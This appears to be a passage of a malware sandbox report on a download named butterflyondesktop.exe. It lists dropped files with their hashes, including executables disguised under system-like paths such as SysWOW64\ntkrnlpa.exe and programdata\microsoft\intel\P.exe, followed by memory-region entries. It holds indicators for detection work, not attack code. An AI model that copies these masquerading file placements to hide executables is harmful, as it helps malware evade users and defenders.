                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\f47ff6a7-3822-4467-8df5-74084ba648ad.tmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      10KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      94931d116ccbe9e2e5b59da6ace3d952

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      794189c3c73b874d31347651deb3d28bb9ef2927

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      ca7f946836a0171d645ecc988be089681e9e5bef1f5db49b38d21c6ad3ecf5d3

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      7fe5917e3ee4683c0d65c8e8e57a53703c8ffba0eae335eea120b8004442b21f9a2afc6d4a3f10ec1c9408485143547ad0fd7e6b1b49afa0499248b93957bb24

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\faca3a6e-97b5-4923-bd3f-3f99b2346249.tmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      10KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      a221dd24b5135339767cefe1db12b8ae

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      86fdd3fe1d2c331cfc32d96b8688fc9dc428c63b

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      3dcc7066ade84d7f7d5e6b501f27f541f5d9ee76b14fc7a305d10ad3c8773014

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      13eb96cb4f50b4762e4b7ce3bc5954b2c2a40859b43fb7412d932155bc978aa831d6396f42472625f6d2ca5ea921eb72dd22ece5abb47714070243b4a1c806e0

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\data_1

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      264KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      d734c6581f9bbf5f0faeb03121f4f5df

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      309601bef15d8c2c8541d99db91a071c7f65628a

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      c06f7165d7143cf13ebe7ab91973cf96c781c748db0e2dbda6a63144b81775ac

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      73f067d82c91d3b5b5469fd3d6782f9cb8bbc08d0b58318e70ada626ec266f4d424108083e2ed4867096f56ac46c4e3771742636023c7444b064d99c49b0c45b

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      195KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      b5143b46d1d24596c1a7ab606c63f84e

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      15a06ecc9ec1847fa77af4b99be338295aaa59bc

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      37acabb2ffdd3afbb4b3d3d1bfd4ad025a63861701798e3d2f2b0c9746d5c92f

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      e9eed3bcf8105188ed1e7f3fde1d5196e7bf5debf552d2c7f977883d2d522618ee37f49d57ef33802542eaf02edb4da1036cfee7bd2edcf77020eedf8ef9c1f9

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      195KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      8bdd79429236653daa5f914988c9ea3c

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      4f7b6d8092e31cebe22733bb06c0084bdb90c30d

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      29da82988feae69457673e4d5680995d35c6b86545595898101db247d3e72acd

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      bdbd7e591d40e7d2dcde14aec6c8177bfeb0af36e642e771ca40d2488b7d3daf29f3a113eded87bb8a874e3a467e69800f8a5dbba448892f1805e4245b875859

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      195KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      6f589131c9d013d866eda7a0edc3c812

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      d8cccf6bcf4f9fd1ae73be4f62c9d42666716e52

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      74b266e91b3b7d55668fc1c6b8c34e7b6296f9b993c368d67c8c173d14acd428

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      128e40a675ac660a68dee7a1b72514e6b1ef51ca64a167de5712fac54286325a8b9c9a98b8e35c7b7067a0c7f93baf1bf1322a99bff70114425e040a59fa2a18

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      152B

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      f74f80cd052dc4903da98dd6916f375d

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      3e3512884ee41291824b30b256670b3d0a1c8d40

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      d9589878daebff7c0991b2007a7af982f4760512545b4e331708f3f3308447ac

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      bd186699a85c91cda88df15ebee640f99b55ff168e228dd0de8d7416d62de1bcb57e88beb3b12ce74a54a9c7491934ef3dd5fdd6b92ab5c909f129b419d96b77

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      152B

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      c32b6fc873c040253034fe4bf5037bd0

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      fc58579eb5bf46c8d5246a45abae3566898c2e27

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      8d59014ec29aebf56b641a018b29b6c64e33764d7a2262283ce51319071f930c

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      e8ba0e9e78bc58b3d6d671a1e693cbe81745f000daaf281cc6aa6c591ae261b981f704e3dcb32f0fef87424aab0f42e4cfe40e445d8ef5a529c7bfda8ac510f2

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      408B

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      3c5740fe60f99fb3697e3d4004d0b3cf

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      339b0d58fd6be5f996634a6a60ba612bdc7a88ad

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      157d48f700a814e4cea82d44b0de81b12c3381515e650bc4f417d93c2c2199ca

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      0c8a3e1e8d53e15cd19a0675cea6414e11d4291e91530e5d219eda119c7a6dc2fbf8f75403186f78075b87c87ca649ae6695c20fee54faec78dacf3efad390ea

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      5KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      9425a916dac4e802019c44b3867ee670

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      6d2b91319c99a4bae20f59d897727d5e71fa0b9d

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      cc609edbd529ffe0845b58fd0f8b8ceca608217d4c9e3b5b98e1c272fdd0bd54

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      748d27e6f894e9a666600b98be8c81e57da46a9bea2f16b59d6db9f51be10c26e369894d8dfdf3747b2ab084f6d5e67f290bef856080aa1568e934a80a33bc40

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      6KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      d612af94424f9bdbfd81ac6efc74e76f

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      79f57459c1d2ecc4f1942d24e2f5463fa99016a5

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      b3354a4931e9ee0bbd874d5b69185b14f7b11b5af18d97845e4508a2bad7a58c

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      eabb9fcd9a98819b1b2a48215e11a781a21b3b18f74899b4fcdc876fa175382ef56aeb01d9a05438321db45b8efecf035becc702535c5bf53550a45b7bdfdb4c

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      7KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      0296c886c41300f397926cb7252fdae0

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      ce3999b8d0a0eec0d057f387812cbdba6c5b8c19

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      8dc79fb3c8a112c18c9967c26ec9cd423132c6d8cc1ccddfff78b78b900e0676

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      c763168d43902e25865de934d33bffd492e757e5409b534a7e1d1a7c448697fce3871236e62ec31983eb63b08ee46a9929dd3204de9051b98345c569ec083e63

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      25KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      5c3d7765ba43bd1edee4b831682a4b15

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      85b74a85860b724221380ac36104c4cee5ed4b38

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      c5f1bd264450e4e5abbc92baa64264e8621ffc3dc7ffe360145958651635b186

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      9e6977b042efa5eb699dcd81cb8246309dc51e89b4e90ad752d4dbafba629c2f55813da36959e4489cae1f738f28c9e1bb976bc030b34e0c956a7656defeadf3

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      16B

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      46295cac801e5d4857d09837238a6394

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      16B

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      206702161f94c5cd39fadd03f4014d98

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\eb8afe5c-6f4f-4436-9b6f-e11f4f4fd063.tmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      1002B

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      8d6b8538006ae3e3c5581099378a5bcc

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      4d1b1350311687eb134fd2bbf727fe0ae1f7fd61

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      3582686bc025cfeef287cbc47dedc0bd798e56a7ec850ec7421f37bc7718eb14

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      420f1e8bebd08aa6515d424a4b2581bcb104cb80d3b26bd340d91896134d91d85b05e88466ed5fd3290d89ec8179a3b501b8d98888e377fb2c0af6a3d88637d1

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      10KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      4d82d9fa8f74d9e39145a72fb2c8bd95

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      5d416e58b37f7a37548fbc3a9ed28f2aaf13785f

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      f8e34833e198fb8e81a2de90939b1f8c2820d4b04d37907919e2a52c029f90dc

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      270dbdb7b321a510b55fad6f86cd14226727f37a6b4cb6b1d36601b17ff1e4a4529b3b8576687d7342a7f9b91dd1f9272e2b3c78ea6f690e1d99c6c8d0ebe1e3

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      10KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      5658131b93cf4cc77979f558f547556d

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      1d22c2b9a543fa22893f7b0e6ee6e6633b800e26

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      1e528c39057a9956bfd16ea7dcf77ef71f30a4d9e282686cf9c2102f82c7d82c

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      c3dac5ea89d73ae9b1948d621924417bf91cd046fc88c228204ac4bfb4cd0aad5c37e26d572bbd37a7414d24ca3c07110b1958974ecb9a45e39f03d0a7f048c5

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      10KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      6b4b13887b758410627ebe6463017487

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      a4bce1718117a886dd9277926f6eb223bcddcca2

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      03d02a741c12959e01b5413b0375bfb76e1a7d35d09d0d230bdbc5022e5e4193

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      edef7281303f80ad33a25b6314a5a5292620f78d457f16b669b6031f22ff1f9be06a71f238763ff366cccd476d4866e0363bfd91a351345e350443056b31bfc6

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      10KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      38b6f0ce1b933438038f3728219c5c47

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      ad739684d8336022bd714c71d9147639e9653164

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      d4ea40c7b327561483d812b90fed4123a313ac29d8e6300cee208c99fd2653bb

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      c11bf926d93ec8f608e85e373ac5556562e9a83fadd633a6b836c3b291d15f4d57dec0e46fb8d0be83d8262e9d64afcad71ce37d305da1f4945163c1883cec4b

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      10KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      1c2620e5269b63b00012229c4c0b9e60

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      547c73539b744240204d0f85899b27f658f81b91

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      98caf2558e140a7f1fb0756c541969f93ea510ca6a3bf403641d98f77425cc85

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      c091d84995b7aa10fc17c718d42bd68e4510c2b74c2f179aacf5fb5e2e4d9a929959648c4408e17620e31ef5dec023819c359beac72b31d1ab6fce63f1d28b51

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      10KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      5318b4b1397ae9c89a5910cb69d4be10

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      8c145dc2f50788ff74b91b53645e9fcd6c3e383f

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      827f827af7bea100f39f958e4617d6a9cb0659799d3f39334eed52fd4090e221

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      f70101eae46bf7ea8f8e8fe07fcdc5a7c74857b8c0de6e813780b2cf483d709d9d18aebf533291219d8aaad1b340737f3ccd8a4e6f9b6d171bbc9bfef086b819

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\aut99.tmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      61B

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      398a9ce9f398761d4fe45928111a9e18

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      caa84e9626433fec567089a17f9bcca9f8380e62

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      e376f2a9dda89354311b1064ea4559e720739d526ef7da0518ebfd413cd19fc1

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      45255ffea86db71fcfcde1325b54d604a19276b462c8cca92cf5233a630510484a0ecb4d3e9f66733e2127c30c869c23171249cfac3bb39ff4e467830cd4b26b

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\autB3C5.tmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4.5MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      f9a9b17c831721033458d59bf69f45b6

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      472313a8a15aca343cf669cfc61a9ae65279e06b

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-S0F8M.tmp\butterflyondesktop.tmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      688KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      c765336f0dcf4efdcc2101eed67cd30c

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      fa0279f59738c5aa3b6b20106e109ccd77f895a7

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      c5177fdc6031728e10141745cd69edbc91c92d14411a2dec6e8e8caa4f74ab28

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      06a67ac37c20897967e2cad453793a6ef1c7804d4c578404f845daa88c859b15b0acb51642e6ad23ca6ba6549b02d5f6c98b1fa402004bdbf9d646abab7ec891

                                                                                                                                                                                                                                                    • C:\Users\Admin\Downloads\butterflyondesktop.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      2.8MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      1535aa21451192109b86be9bcc7c4345

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      1af211c686c4d4bf0239ed6620358a19691cf88c

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      4641af6a0071e11e13ad3b1cd950e01300542c2b9efb6ae92ffecedde974a4a6

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      1762b29f7b26911a7e6d244454eac7268235e2e0c27cd2ca639b8acdde2528c9ddf202ed59ca3155ee1d6ad3deba559a6eaf4ed74624c68688761e3e404e54da

                                                                                                                                                                                                                                                    • C:\Users\Admin\Downloads\butterflyondesktop.exe:Zone.Identifier

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      26B

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      fbccf14d504b7b2dbcb5a5bda75bd93b

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      d59fc84cdd5217c6cf74785703655f78da6b582b

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\ntkrnlpa.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      373KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      30cdab5cf1d607ee7b34f44ab38e9190

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      d4823f90d14eba0801653e8c970f47d54f655d36

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      1517527c1d705a6ebc6ec9194aa95459e875ac3902a9f4aab3bf24b6a6f8407f

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      b465f3b734beaea3951ff57759f13971649b549fafca71342b52d7e74949e152c0fbafe2df40354fc00b5dc8c767f3f5c6940e4ba308888e4395d8fd21e402b3

                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\ntkrnlpa.exe:Zone.Identifier

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      92B

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      c6c7806bab4e3c932bb5acb3280b793e

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      a2a90b8008e5b27bdc53a15dc345be1d8bd5386b

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      5ba37b532dbb714d29f33e79dacb5740096fd1e89da0a07b9b8e6b803931c61a

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      c648be984413fdbaeb34808c8164c48b5441a8f3f35533b189f420230e5e90605c15fde2ce0d9fe42e9755c594dd1ef32de71a24016277ad2cef2f9afcf0ad93

                                                                                                                                                                                                                                                    • C:\programdata\install\cheat.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      4.5MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      c097289ee1c20ac1fbddb21378f70410

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      d16091bfb972d966130dc8d3a6c235f427410d7f

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      46236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d

                                                                                                                                                                                                                                                    • C:\programdata\install\ink.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      112KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      ef3839826ed36f3a534d1d099665b909

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      8afbee7836c8faf65da67a9d6dd901d44a8c55ca

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8

                                                                                                                                                                                                                                                    • C:\programdata\microsoft\intel\P.exe

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      382KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      b78c384bff4c80a590f048050621fe87

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      f006f71b0228b99917746001bc201dbfd9603c38

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab

                                                                                                                                                                                                                                                    • memory/480-370-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      80KB

                                                                                                                                                                                                                                                    • memory/480-302-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      80KB

                                                                                                                                                                                                                                                    • memory/480-354-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      80KB

                                                                                                                                                                                                                                                    • memory/480-304-0x0000000000401000-0x000000000040B000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      40KB

                                                                                                                                                                                                                                                    • memory/2188-2750-0x0000000000400000-0x00000000009B6000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      5.7MB

                                                                                                                                                                                                                                                    • memory/2188-2679-0x0000000000400000-0x00000000009B6000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      5.7MB

                                                                                                                                                                                                                                                    • memory/2188-2751-0x0000000000400000-0x00000000009B6000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      5.7MB

                                                                                                                                                                                                                                                    • memory/2188-2684-0x0000000000400000-0x00000000009B6000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      5.7MB

                                                                                                                                                                                                                                                    • memory/2188-2810-0x0000000000400000-0x00000000009B6000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      5.7MB

                                                                                                                                                                                                                                                    • memory/2188-2686-0x0000000000400000-0x00000000009B6000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      5.7MB

                                                                                                                                                                                                                                                    • memory/2264-2278-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      6.7MB

                                                                                                                                                                                                                                                    • memory/2264-2233-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      6.7MB

                                                                                                                                                                                                                                                    • memory/2264-2236-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      6.7MB

                                                                                                                                                                                                                                                    • memory/2264-2238-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      6.7MB

                                                                                                                                                                                                                                                    • memory/2264-2237-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      6.7MB

                                                                                                                                                                                                                                                    • memory/2264-2234-0x0000000000400000-0x0000000000AB9000-memory.dmp

                                                                                                                                                                                                                                                      Filesize

